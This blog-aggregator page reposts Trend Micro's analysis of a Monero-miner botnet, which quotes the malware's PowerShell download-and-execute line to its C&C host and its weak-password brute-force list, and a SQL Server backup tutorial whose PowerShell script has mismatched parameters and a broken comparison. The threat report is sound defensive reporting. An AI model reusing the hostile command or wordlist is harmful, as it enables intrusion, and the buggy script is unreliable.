#Check if

terabitweb · 6 years ago

Text

Original Post from Trend Micro Author: Trend Micro

By Augusto Remillano II and Arvin Macaraeg

We detected a malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible. Initially observed in China in early 2019, the methods it previously used to infect networks involved accessing weak passwords and using pass-the-hash technique, Windows admin tools, and brute force attacks with publicly available codes. However, this new case we found in Japan involves the use of the EternalBlue exploit and the abuse of PowerShell to break into the system and evade detection.

It appears that the attackers are now expanding this botnet to other countries; our telemetry has since detected this threat in Australia, Taiwan, Vietnam, Hong Kong, and India.

Propagation and Behavior

The malware’s (detected by Trend Micro as Trojan.PS1.LUDICROUZ.A) primary propagation technique involves trying a list of weak credentials to log into other computers connected to the network. Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware. The downloaded PowerShell script is executed with

IEX (New-Object Net.WebClient).downloadstring(‘hxxp://v.beahh[.]com/wm?hp’)

123456

password

PASSWORD

football

welcome

123

321

1234

12345

123123

123321

111111

654321

666666

121212

000000

222222

888888

1111

555555

1234567

12345678

123456789

987654321

admin

abc123

abcd1234

abcd@1234

abc@123

p@ssword

P@ssword

p@ssw0rd

P@ssw0rd

P@SSWORD

P@SSW0RD

P@$$w0rd

P@$$word

P@$$w0rd

iloveyou

monkey

passw0rd

master

hello

qazwsx

password1

qwerty

baseball

qwertyuiop

superman

1qaz2wsx

fuckyou

123qwe

zxcvbn

pass

aaaaaa

love

administrator

Table 1. List of weak passwords used for primary propagation.

It also uses this list with Invoke-WMIMethod (detected by Trend Micro as HackTool.Win32.Impacket.AI) to gain remote access to other machines:

Figure 1. Invoke-WMIMethod for remote access to machines with weak passwords.

The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.

Figure 2. Malware using pass-the-hash technique to get the hash of the user’s password and hashes of the weak passwords.

If successful, it deletes the file %Start Menu%ProgramsStartuprun.bat, likely a dropped file of an older version of the malware. It also drops the following:

%Application Data%flashplayer.tmp

%Application Data%sign.txt – used to indicate that the machine is already infected

%Start Menu%ProgramsStartupFlashPlayer.lnk – responsible for executing the script tmp at startup

If the user has a stronger password, the malware uses EternalBlue to propagate.

Figure 3. Exploit payload.

Once a machine is infected via one of the methods, the malware acquires the MAC address and collects information on the anti-virus products installed in the machine. It downloads another obfuscated PowerShell script (detected by Trend Micro as Trojan.PS1.PCASTLE.B) from the C&C server, and analysis revealed that the download URL sends back the information it acquired earlier to its handler. The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.

Figure 4. Routine for acquiring the MAC address and AV products installed by the malware.

To check whether the malware already installed its components it looks for the following files:

%Temp%kkk1.log

%Temp%pp2.log

%Temp%333.log

%Temp%kk4.log

%Temp%kk5.log

Figure 5. Checking for installed malware components.

With each $flagX representing a component, the malware downloads a newer version of the PowerShell dropper script ($flag) and installs a scheduled task to run it regularly if it is still unset. The behavior of the malware depends on the privilege it was run. $flag2 also downloads a copy of the malware from a different URL and creates a differently named scheduled task.

Figure 6. $flag and $flag2 for scheduled tasks.

The third component (detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI) is a dropped Trojan — a copy of itself in a larger file size, likely to evade sandboxes — that collects system information from the host:

Computer Name

Machine’s GUID

MAC Address

OS Version

Graphics Memory Information

System Time

The fourth component is a Python-compiled binary executable that further propagates the malware, also capable of pass the hash attacks by dropping and executing a PowerShell implementation of Mimikatz (detected by Trend Micro as Trojan.PS1.MIMIKATZ.ADW).

Figure 7. Dropping the fourth executable component.

Figure 8. Checking if the Mimikatz component is already installed, and executing Mimikatz.

The malware also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands using xp_cmdshell upon access. Like the main file, the component scans IP blocks for vulnerable devices that can be exploited using EternalBlue by reusing publicly available codes related to previous exploits.

Figure 9. Scanning for vulnerable database servers.

The fifth component is an executable that is downloaded and executed. However, the download URL was offline at the time of writing.

The malware’s payload — a Monero coinminer — is also deployed by PowerShell, but is not stored in a file. Instead, it is injected into its own PowerShell process with another publicly available code, Invoke-ReflectivePEInjection. After installation, the malware reports its status to the C&C server.

Figure 10. PowerShell script that downloads and executes the miner payload.

Figure 11. Executing the miner payload.

Conclusion

We found the malware sample to be sophisticated, designed specifically to infect as many machines as possible and to operate without immediate detection. It leverages weak passwords in computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts with components downloaded and executed in memory, exploits unpatched vulnerabilities, and installs using the Windows startup folder and the task scheduler. Considering the increasing popularity of PowerShell and more publicly available open-source codes, we can expect to see more complicated malware like these. And while system information being collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to machines and may be used to trace, identify, and track users and activities.

Figure 12. Malware’s new URL.

We recommend updating systems with available patches from legitimate vendors as soon as possible. Users of legacy software should also update with virtual patches from credible sources. As of this writing, the malware is still active and was updated, connecting to a new URL. Use complicated passwords, and authorize layered authentication whenever possible. Enterprises are also advised to enable a multi-layered protection system that can actively block these threats and malicious URLs from the gateway to the endpoint.

Indicators of Compromise

SHA256 Detection 3f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41 Trojan.PS1.MIMIKATZ.ADW 7c402add8feffadc6f07881d201cb21bc4b39df98709917949533f6febd53b6e Trojan.PS1.LUDICROUZ.A aaef385a090d83639fb924c679b2ff22e90ae9377774674d537670a975513397 TrojanSpy.Win32.BEAHNY.THCACAI e28b7c8b4fc37b0ef91f32bd856dd71599acd2f2071fcba4984cc331827c0e13 Trojan.PS1.PCASTLE.B fa0978b3d14458524bb235d6095358a27af9f2e9281be7cd0eb1a4d2123a8330 HackTool.Win32.Impacket.AI

URLs

hxxp://down[.]beahh[.]com/c32.dat

hxxp://down[.]beahh[.]com/new.dat?allv5

hxxp://ii[.]ackng[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://log[.]beahh[.]com/logging.php?ver=5p?src=wm&target

hxxp://oo[.]beahh[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://p[.]beahh[.]com/upgrade.php

hxxp://pp[.]abbny[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://v[.]beahh[.]com/wm?hp

hxxp://v[.]y6h[.]net/g?h

hxxp://v[.]y6h[.]net/g?l

lplp1[.]abbny[.]com:443

lplp1[.]ackng[.]com:443

lplp1[.]beahh[.]com:443

Additional insights and analysis by Carl Maverick Pascual and Patrick Angelo Roderno.

The post Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse appeared first on .

#gallery-0-5 { margin: auto; } #gallery-0-5 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-5 img { border: 2px solid #cfcfcf; } #gallery-0-5 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Trend Micro Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse Original Post from Trend Micro Author: Trend Micro By Augusto Remillano II and Arvin Macaraeg We detected a malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible.

#Trend Micro

0 notes

marcosplavsczyk · 8 years ago

Link

Eighty-two percent of the enterprises expect the number of databases to increase over the next twelve months. An increase in data volumes can have negative effects on the performance of databases. Think about the storage requirement and backup strategy to meet the Recovery Time Objective and the Recovery Point Objective. RPO and RTO are two of the most important parameters of a disaster recovery or data protection plan.

Database backup overview

Let us take a look at some of the most common ways to back up the SQL Server database, and some of the best and most feasible solutions for data protection and disaster recovery scenarios.

Let us focus on handling huge volumes of data using various techniques and/or methodologies. Some of us may have questions on how to decide the best-suited backup strategies for our environments; on automating and managing SQL Server database backup; on whether we should automate the database backup process using T-SQL, SSIS, or PowerShell or some other tool or technique; what the data recovery and protection plans available are; whether the SQL engine provides the required capabilities to schedule a job and run it across multiple servers; whether customization options are available; whether we have a robust method to perform backup activity.

Let find out the answers to those questions. I’m sure you’ll not be disappointed!

Getting started

A database administrator must make sure that all databases are backed up across environments. Understanding the importance of database backup is critical. Setting the right recovery objective is vital, and hence, we need to consider the backup options carefully. Configuring the retention period is another area to ensure integrity of the data.

Backing up data regularly is always a good strategy on the one hand, and on the other, we must regularly test the backup copies to ensure that they’re tested and validated for smooth working of the systems, and to prevent any sort of corruption or, under extreme conditions, a disaster. The well-tested SQL Server database backup script that we’re going to discuss provides an essential safeguard for protecting the (critical) data stored in the SQL Server databases. Backups are also very important to preserve modifications to the data on regular basis.

With a well-configured SQL Server database backup, one can recover data from many failures such as:

Hardware failures

User-generated accidents

Catastrophic disasters

Let us now look at the various options and methodologies which can be used to initiate a database backup.

There are different ways to back-up a database:

SSMS – Backups can be performed manually using SQL Server Management Studio

SQL Agent Job – Using a T-SQL script for backup

Using Maintenance Plan – SSIS Packages

SMO (SQL Server Management Objects) – PowerShell Scripts

Using ApexSQL Backup

This article talks about the use SQL Server Management Objects (SMO) and its advantages in making life easier. SMO is a complete library of programmatically accessed objects that enable an application to manage a running instance of Microsoft SQL Server Services. PowerShell is used to create this SQL Server databases backup script using the SMO classes. The script backs up specific or all databases of an instance to the backup location, or a local/remote/network share, and manages the backup files as per the retention period set.

Let’s look at how other DBAs in the industry are tackling massive data growth, what their most important goals are, and strategy to backup SQL Server databases automatically. Let us also look at some of the third party tools for backup management.

The first three options are very well discussed in the How to backup multiple SQL Server databases automatically article. Now that the first three points are already covered, let’s look at the use of the PowerShell SMO options with ApexSQL Backup. We’ll learn about how we can increase the database performance and eliminate downtime to give users the best experience possible using ApexSQL Backup. Today’s challenge is to give customers the most visually appealing and contextually rich insights possible in a user-friendly interface. ApexSQL has all the rich features and has the intelligence to manage and deploy a SQL backup plan to many SQL instances. A good way to start this process is to test the feasibility by downloading the free trial version of the tool.

Initial preparation

The goal of many organizations is to manage the backup of SQL Server databases automatically. We’ll go through the necessary steps to create the PowerShell SQL Server database backup script shortly. We can list any number of SQL servers and databases using the script. We can also create multiple jobs to initiate backup on multiple servers.

Pre-requisites

Enable XP_CMDSHELL

EXEC sp_configure 'show advanced options', 1; GO -- To update the currently configured value for advanced options. RECONFIGURE; GO -- To enable the feature. EXEC sp_configure 'xp_cmdshell', 1; GO -- To update the currently configured value for this feature. RECONFIGURE; GO

Before you proceed, set the execution policy on PowerShell

Load the necessary modules if they’re not loaded automatically

Add full rights on file share or local or remote location where you’d like the backups stored

Add default permissions to BACKUP DATABASE and BACKUP LOG to members of the sysadmin fixed server role and the db_owner and db_backupoperator fixed database roles

The following code section details

Handling multiple SQL Server databases automatically

Managing local or remote database backups

Email notification upon completion of every successful backup

Setting the retention period

Scheduling automated jobs

Constructing the PowerShell script

Let us walk through the script, step-by-step, along with looking at the details of the setup and configuration of the script. The complete script can be found in Appendix (A)

Step 1: Declare the variable, and load the SMO library

Step 2: Define the email functionality

Step 3: Looping through databases

Step 4: Initiate Database backup and Email body preparation

Step 5: Manage database backup file

Let’s now go about using this script to back up the database by scheduling an SQL Job. Using Object Explorer, expand the SQL Server Agent. Right-click on Jobs. Select New job.

In the General tab of the window that pops up, enter the name, owner and the description for the job. Let’s call this SQLBackupCentralizedJob.

In the Steps tab, click on New to configure the job.

In the General tab,

Mention the step name as SQLBackup,

Set the job type to Transact-SQL script (T-SQL)

Select the master database in the Database box.

Paste the following script that will be used for this job in the Command box. Click OK.

master..xp_cmdshell 'PowerShell.exe F:\PowerSQL\MSSQLBackup.ps1'

Click OK.

We have now successfully created the job.

Right-click on SQLBackup_CentralizedJob and run it.

We can check the backup folder for the backup files; it would tell us the progress, like so:

Invoke_SQLDBBackup -SQLServer HQDBT01 -BackupDirectory f:\SQLBackup -dbList "SQLShack_Demo,ApexSQLBAckup" -rentention 3 -Mail Yes Invoke_SQLDBBackup -SQLServer HQDBSP18 -BackupDirectory f:\PowerSQL -dbList "SafetyDB,rtc,rtcab1" -rentention 3 -Mail Yes

Verify the email

Back up multiple SQL databases with ApexSQL Backup

ApexSQL Backup is a third-party software solution that can be used to define and/or manage the backup/restore processes and perform various maintenance operations. The tool is capable of performing the backup of SQL Server databases automatically.

The backup of multiple SQL databases can be configured in a few simple steps:

Step 1: Register the server

Select Home tab

Click Add button

Enter the SQL Server

Select authentication type

Click Ok

Step 2: The Backup Configuration Wizard

Now you should see all the databases that are available on that server. Click on the Backup button on the Home ribbon tab to configure the jobs.

The main tab of the backup wizard is for backup settings and defining the backup configuration. This section has three options

Backup

Select the SQL Server from the drop-down list; you can select the server you’d like to configure the backup for

In the Databases, browse and select the intended databases for backup

Click OK

Next, set the backup type, defining the backup location and its standards

Select the type of the database backup

To have a better experience, set the Job name and the Job description. It’s usually a good practice to do so.

Click on the Add Destination button, and set backup the destination path, or configure custom naming rules.

Browse for the destination path in the Folder text box.

In the Filename box, configure the format of the backup filename by clicking on the corresponding tags—you can select from the seven available tags. Each of those can be included in the backup filename. Check the summary and click OK if everything is configured as required. You can click on ApexSQL defaults to reset the configuration.

Click OK

Now, let us schedule the backup job using the Schedule wizard. This wizard is invoked using the overflow (…) button.

In the wizard, set the frequency, daily frequency and activity schedule of database backup as desired. Check the summary at the bottom of the page to confirm that the configuration is done as required. Click OK to save changes in the Schedule Wizard.

Click OK.

The Advanced tab

We can add various media, verification, compression and encryption options along with encryption settings in the Advanced tab of the wizard.

Set the retention period in the cleanup tab to clean-up the database backup files

Click OK.

Notification

Use the notification tab to set the type of alerts you would like an email notification sent for.

Use Options tab to select the notification events

Click the Add button to add recipient details

Click OK to commit.

After the configuration is complete, click OK to confirm the same. This would create backup jobs for the databases. We performed one configuration, but it created jobs for each of the databases we selected. It couldn’t get any easier! Of course, you can make individual modifications to create exceptions.

Select the Schedules view in main application form to check the jobs we created. Just like selecting the databases, you can check the box on the header to select all the schedules we created. Right-click on any of the schedules to bring up the context menu. Select Run now. The corresponding jobs will be executed immediately, irrespective of the schedule settings—this is like a force-run.

The result column shows the final status of the database backup jobs—the status of each of the jobs that have the schedule information in the central repository. If you’d like to perform an action on any one job, you can select the relevant checkbox and click on the action, such as Run now, or Disable.

The activities tab, the central dashboard to view the job activities performed through ApexSQL Backup.

The message column gives user-friendly information, which is helpful in troubleshooting the backup jobs. The initial two failures as seen below are due to the fact that the database was offline. It was later fixed, and the job completed successfully in the third attempt.

The History tab shows the backup history for the database selected from the Server pane on the left.

Let us now check for the backup files that got created in the folder we specified as the backup path. We can easily recognize the backup files by their custom filenames. The creation date and time are also available. Notice the file names marked in red.

Also, here’s the summary email notification (Success and Failure)

Wrapping Up

In an environment that relies on a SQL Server backup database script, or a managed native backup methodology, one could try using PowerShell scripts using SMO. We also saw how to backup SQL Server databases automatically using scripts. PowerShell scripts are mostly sequential in nature, unless they are enhanced in order to run parallel processes. However, the latter takes significant effort to define and configure. ApexSQL Backup makes managing these processes much simpler because of its built-in options to handle these tasks in a more efficient manner.

References

How to backup multiple SQL Server databases automatically

Using the Set-ExecutionPolicy Cmdlet

Using PowerShell and SMO to list Databases (and other stuff)

Send-MailMessage

Appendix (A)

Function Get-SQLDBBackup { param ( [Parameter (Mandatory=$true,Position=0)][String]$SQLServer, [Parameter(Mandatory=$true,Position=1)][String]$BackupDirectory, [Parameter(Mandatory=$true,Position=2)][String]$dbList, [Parameter(Mandatory=$true,Position=3)][int]$retention, [Parameter(Mandatory=$true,Position=3)][String]$Mail) #loading SMO library [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SMO") | Out-Null [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SmoExtended") | Out-Null [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.ConnectionInfo") | Out-Null [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SmoEnum") | Out-Null # Setting the backup data in yyyyMMdd_HHmmss that is 20170619_130939 $BackupDate = get-date -format yyyyMMdd_HHmmss Function sendEmail { param($from,$to,$subject,$smtpServer) [string]$recipients="$to" $body = New-Object System.Net.Mail.MailMessage $from, $recipients, $subject, $body $smtpServer = $smtpServer $smtp = new-object Net.Mail.SmtpClient($smtpServer) $smtp.Send($body) } #Define the SMO class library $Server = new-object ("Microsoft.SqlServer.Management.Smo.Server") $SQLServer #Iterating the SQL Server databases of a given instance foreach ($Database in $Server.databases) { # Teh foreach($db in $DbList.split(",")) { if($Database.Name -eq $db) { $DatabaseName = $Database.Name $DatabaseBackup = new-object ("Microsoft.SqlServer.Management.Smo.Backup") $DatabaseBackup.Action = "Database" $DatabaseBackup.Database = $DatabaseName #Set the directory for backup location $BackupFileName=$BackupDirectory + "\" + $DatabaseName + "_" + $BackupDate + ".BAK" #write-host $BackupFileName $DatabaseBackup.Devices.AddDevice($BackupFileName, "File") try { Write-Progress -Activity "Please wait! Backing up SQL databases... " -Status "Processing:" -CurrentOperation "Currently processing: $DatabaseName" $DatabaseBackup.SqlBackup($Server) $body=@" Notification that a $DatabaseName is backed up! successfully with date and time stamp $BackupDate "@ } catch { $body=@" Notification that a $DatabaseName is backed failed! with an error message $_.Exception.Message "@ } write-host $status if ($Mail ='Yes') { sendEmail -To "[email protected]" -Subject " $SQLServer -> $DatabaseName Backup Status" ` -From "[email protected]" -Body $body ` -smtpServer "hqmail.abc.com" } # Preparing the UNC path for the database backup file handling # fetching the drive letter. First argument is that starting position in the string, and the second is the length of the substring, starting at that position. $drive=$BackupFileName.substring(0,1) $len=$BackupDirectory.length #write-host $len #Selecting the string portion of a directory that is fetching the string starting from the character posittion $path=$BackupDirectory.substring(3,$len-3) #write-host \\$SQLServer\$drive$\$path # Listing the files which is older than 3 minutes in this caseon a server. It can be local or remote location $file=get-ChildItem \\$SQLServer\$drive$\$path -recurse -Filter $DatabaseName*.bak | Select-object LastWriteTime,directoryname,name |where-object {$_.LastWriteTime -lt [System.DateTime]::Now.Addminutes(-$rentention)} #Iterating each file and remove the file with remove-item cmdlet foreach($f in $file) { $filename=$f.directoryname+'\'+$f.name write-host 'File deleted' $filename remove-item $filename -Force } #$DatabaseBackup | select LogicalName, Type, Size, PhysicalName | Format-Table -AutoSize } } } } Get-SQLDBBackup -SQLServer HQDBT01 -BackupDirectory f:\SQLBackup -dbList "SQLShack_Demo,ApexSQLBackup" -rentention 3 -Mail Yes Get-SQLDBBackup -SQLServer HQDBSP18 -BackupDirectory f:\PowerSQL -dbList "SafetyDB,rtc,rtcab1" -rentention 3 -Mail Yes

The post Multi server PowerShell script to backup SQL Server databases automatically appeared first on Solution center.

#SQL Solution Center

0 notes